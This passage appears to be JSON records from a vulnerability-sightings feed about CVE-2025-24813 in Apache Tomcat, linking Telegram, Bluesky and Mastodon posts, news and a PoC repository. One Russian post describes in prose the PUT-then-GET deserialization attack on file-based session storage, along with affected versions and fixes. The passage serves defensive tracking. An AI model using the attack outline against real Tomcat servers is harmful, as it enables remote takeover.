enabled\u00a0Default Servlet\u00a0in Apache Tomcat.", "creation_timestamp": "2025-03-16T14:00:01.000000Z"}, {"uuid": "5da9c6a1-9329-4826-b0ff-ca26a270b7f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/474", "content": "CVE-2025-24813 Apache Tomcat RCE\n*", "creation_timestamp": "2025-03-16T13:59:18.000000Z"}, {"uuid": "fb8b15a0-23fb-4851-b7a1-9621a3244de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/true_secator/6850", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a CVE-2025-24813, \u0442\u0435\u043f\u0435\u0440\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 PUT.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 GitHub \u0432\u0441\u0435\u0433\u043e \u0447\u0435\u0440\u0435\u0437 30 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u041e\u043d\u0430 \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 Apache \u0432 \u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a 10 \u043c\u0430\u0440\u0442\u0430 2025 \u0433\u043e\u0434\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Apache Tomcat \u0432\u0435\u0440\u0441\u0438\u0439 11.0.0-M1\u201311.0.2, 10.1.0-M1\u201310.1.34 \u0438 9.0.0.M1\u20139.0.98.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Wallarm \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044f, \u0447\u0442\u043e \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u043f\u0440\u043e\u0441\u044b PUT \u0432\u044b\u0433\u043b\u044f\u0434\u044f\u0442 \u0432\u043f\u043e\u043b\u043d\u0435 \u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0435\u043d\u0442 \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0438 base64.\n\n\u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 PUT, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0432 base64 \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 Java, \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u0443\u044e \u0432 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432 Tomcat.\n\n\u0417\u0430\u0442\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 GET \u0441 cookie-\u0444\u0430\u0439\u043b\u043e\u043c JSESSIONID, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u043c \u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u0435\u0430\u043d\u0441\u0430, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f Tomcat \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 Java, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c.\n\n\u0410\u0442\u0430\u043a\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u0442\u0435\u043c, \u0447\u0442\u043e Tomcat \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b PUT \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0441\u0435\u0430\u043d\u0441 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b Tomcat \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u044b\u0447\u043d\u044b\u043c \u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f\u0445.\n\nApache \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 Tomcat 11.0.3+, 10.1.35+ \u0438\u043b\u0438 9.0.99+, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2025-24813.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Tomcat \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0440\u0435\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0432\u0435\u0440\u043d\u0443\u0432\u0448\u0438\u0441\u044c \u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e (readonly= \"true\"), \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0432 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u0443\u044e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 PUT \u0438 \u0438\u0437\u0431\u0435\u0433\u0430\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043f\u043e\u0434\u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\u0445 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043f\u0443\u0442\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Wallarm \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435 \u0441\u0430\u043c\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0433\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0430 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u044e\u0449\u0438\u0445 \u0438\u0437-\u0437\u0430 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 PUT \u0432 Tomcat.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043d\u0430\u0447\u043d\u0443\u0442 \u043c\u0435\u043d\u044f\u0442\u044c \u0442\u0430\u043a\u0442\u0438\u043a\u0443, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b JSP, \u0438\u0437\u043c\u0435\u043d\u044f\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0438 \u0440\u0430\u0437\u043c\u0435\u0449\u0430\u044f \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 \u0441\u0435\u0430\u043d\u0441\u043e\u0432, \u0442\u0430\u043a \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f - \u044d\u0442\u043e \u043b\u0438\u0448\u044c \u043f\u0435\u0440\u0432\u0430\u044f \u0432\u043e\u043b\u043d\u0430, \u043f\u043e \u0438\u0445 \u043c\u043d\u0435\u043d\u0438\u044e.\n\n\u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2025-03-18T11:40:05.000000Z"}, {"uuid": "59bc550d-a673-4354-b1d6-7209e281283b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/T-_K-PJ-Vo7ZUWhJQQWXmj0izyIt8dnCmdBUAy9wO20y3cQ", "content": "", "creation_timestamp": "2025-03-17T09:39:16.000000Z"}, {"uuid": "79c41af1-fd8b-4605-9ffb-bf77516a65c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/CyberSecurityIL/67640", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 - \u05d7\u05d5\u05dc\u05e9\u05d4 \u05e7\u05e8\u05d9\u05d8\u05d9\u05ea \u05d1-Apache Tomcat \u05de\u05e0\u05d5\u05e6\u05dc\u05ea \u05d1\u05e4\u05d5\u05e2\u05dc \u05e2\u05dc \u05d9\u05d3\u05d9 \u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05de\u05e1\u05d1\u05d9\u05d1 \u05dc\u05e2\u05d5\u05dc\u05dd.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2025-24813, \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05dc\u05d4\u05e8\u05d9\u05e5 \u05e7\u05d5\u05d3 \u05de\u05e8\u05d7\u05d5\u05e7 \u05d1\u05d0\u05de\u05e6\u05e2\u05d5\u05ea \u05e9\u05dc\u05d9\u05d7\u05ea \u05d1\u05e7\u05e9\u05d5\u05ea \u05dc\u05e9\u05e8\u05ea \u05d2\u05dd \u05dc\u05dc\u05d0 \u05d4\u05d6\u05d3\u05d4\u05d5\u05ea.\n\n\u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd - \u05db\u05d0\u05df.\n\n\u05ea\u05d9\u05e7\u05d5\u05df \u05e4\u05d5\u05e8\u05e1\u05dd \u05d1\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea 11.0.3+, 10.1.35+, \u05d0\u05d5 9.0.99+\n\nhttps://t.me/CyberSecurityIL/6815\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2025-03-17T15:15:09.000000Z"}, {"uuid": "97899bae-3ae6-49af-8cb1-9de7a6d33285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/information_security_channel/53254", "content": "Exploit Code for Apache Tomcat RCE Vulnerability Published on Chinese Forum\nhttps://www.securityweek.com/exploit-code-for-apache-tomcat-rce-vulnerability-published-on-chinese-forum/\n\nExploits swirling for remote code execution vulnerability (CVE-2025-24813) in open-source Apache Tomcat web server.\nThe post Exploit Code for Apache Tomcat RCE Vulnerability Published on Chinese Forum (https://www.securityweek.com/exploit-code-for-apache-tomcat-rce-vulnerability-published-on-chinese-forum/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2025-03-17T20:59:10.000000Z"}, {"uuid": "9ee07648-60da-4efb-88be-a69dd9fc9109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24810", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113904149861159404", "content": "", "creation_timestamp": "2025-01-28T04:43:17.143450Z"}, {"uuid": "8b5889ed-45c5-4116-b690-bf497853e044", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llmbcjsy3y2k", "content": "", "creation_timestamp": "2025-03-30T16:30:07.926184Z"}, {"uuid": "9f0b1175-ebea-4228-8b98-ac8d81ebf1e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3llmcv5oink62", "content": "", "creation_timestamp": "2025-03-30T18:54:42.127861Z"}, {"uuid": "979ef832-5c15-4f63-b1df-32736b7cc783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/keesnk.bsky.social/post/3llnne2pwck2m", "content": "", "creation_timestamp": "2025-03-31T05:38:23.958552Z"}, {"uuid": "18f1e862-1c5f-4dba-a5a2-ff45eb2e80ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/threatcodex/statuses/114258768746288578", "content": "", "creation_timestamp": "2025-03-31T19:47:31.263778Z"}, {"uuid": "7e4e7064-55a1-45db-ab4a-426f3a68b4d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lgni6cfjy523", "content": "", "creation_timestamp": "2025-01-26T12:59:43.477203Z"}, {"uuid": "12fe16d4-a6fb-49d7-ae8c-f683950fb679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lloh3tarruk2", "content": "", "creation_timestamp": "2025-03-31T13:22:05.176042Z"}, {"uuid": "db33db32-0b39-464b-b56d-54e0fced3b8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/tweekfawkes.bsky.social/post/3lksnrmbgso2i", "content": "", "creation_timestamp": "2025-03-20T12:04:05.794441Z"}, {"uuid": "df0c6631-d69a-4f76-bc5b-b5c31149d7dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3lklnefya422p", "content": "", "creation_timestamp": "2025-03-17T17:08:06.479889Z"}, {"uuid": "98e6480b-b1c5-479b-8b40-7d04f404d702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/@decio/114178686852726674", "content": "", "creation_timestamp": "2025-03-17T17:11:45.356934Z"}, {"uuid": "c5597af4-ec33-4b93-bf3f-073d6b9039a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://github.com/absholi7ly/POC-CVE-2025-24813", "content": "", "creation_timestamp": "2025-03-17T17:12:01.668388Z"}, {"uuid": "64556695-ce2e-45d1-a4d9-9048180203f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/piyokango.bsky.social/post/3lky2dh5cwc2k", "content": "", "creation_timestamp": "2025-03-22T15:32:08.864422Z"}, {"uuid": "e83b1ea2-161f-427c-adf8-792795a3fd0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3lknwh4wbds2i", "content": "", "creation_timestamp": "2025-03-18T14:56:02.345143Z"}, {"uuid": "3281ca91-af27-4bdf-a906-8cc144fad823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lkpseehj6zv2", "content": "", "creation_timestamp": "2025-03-19T08:52:49.636434Z"}, {"uuid": "77266eec-fdd7-43a4-8cdc-393f7a39656d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ehcgroup.bsky.social/post/3lk6ys62pi22w", "content": "", "creation_timestamp": "2025-03-12T16:28:03.077293Z"}, {"uuid": "b952a8ff-97f7-4d6e-a64f-f2ec4bfe5b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/zackster.bsky.social/post/3lknx5d26b62m", "content": "", "creation_timestamp": "2025-03-18T15:08:22.739416Z"}, {"uuid": "9f2d5876-91d6-41c9-99df-5f46c99cbc3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkviioziarx2", "content": "", "creation_timestamp": "2025-03-21T15:15:28.180883Z"}, {"uuid": "1ba414a6-2456-4553-b631-14739b4d8f8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/dragstersystems.bsky.social/post/3lk6zyzv4ac23", "content": "", "creation_timestamp": "2025-03-12T16:49:46.850757Z"}, {"uuid": "2199ed9b-4460-4576-b4b4-4fc646f1b4e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/fireboat.bsky.social/post/3lklq7b5crc2t", "content": "", "creation_timestamp": "2025-03-17T17:58:53.533977Z"}, {"uuid": "7bee1d34-709e-400f-93a5-e162da70ab88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3lklr5mydo22i", "content": "", "creation_timestamp": "2025-03-17T18:15:51.933167Z"}, {"uuid": "3d9d783b-4469-4e21-a139-70da3a671e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lklrlhrayc27", "content": "", "creation_timestamp": "2025-03-17T18:23:38.629910Z"}, {"uuid": "afdccd7a-c485-4364-b6af-8940c18f1a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://infosec.exchange/users/tomcat/statuses/114179390408544532", "content": "", "creation_timestamp": "2025-03-17T19:20:33.000000Z"}, {"uuid": "47a5d13b-8996-48b8-8142-12e1d8e962b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll5mebo63f72", "content": "", "creation_timestamp": "2025-03-24T20:44:36.923287Z"}, {"uuid": "bc0ea431-d893-48e4-8dda-4905cd16bb08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk34atqmj22v", "content": "", "creation_timestamp": "2025-03-11T03:19:19.002052Z"}, {"uuid": "4910d2e1-834b-48db-8a0b-cbe20f0d812b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://threatintel.cc/2025/03/18/critical-rce-flaw-in-apache.html", "content": "", "creation_timestamp": "2025-03-18T12:16:32.000000Z"}, {"uuid": "d417faa1-4e83-4e9f-9647-9ab5446b5290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4m3ckhnen2", "content": "", "creation_timestamp": "2025-03-24T11:00:56.151403Z"}, {"uuid": "37f4ca95-ca20-4f26-80b9-d22eb9794f4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4n63andcn2", "content": "", "creation_timestamp": "2025-03-24T11:20:53.013856Z"}, {"uuid": 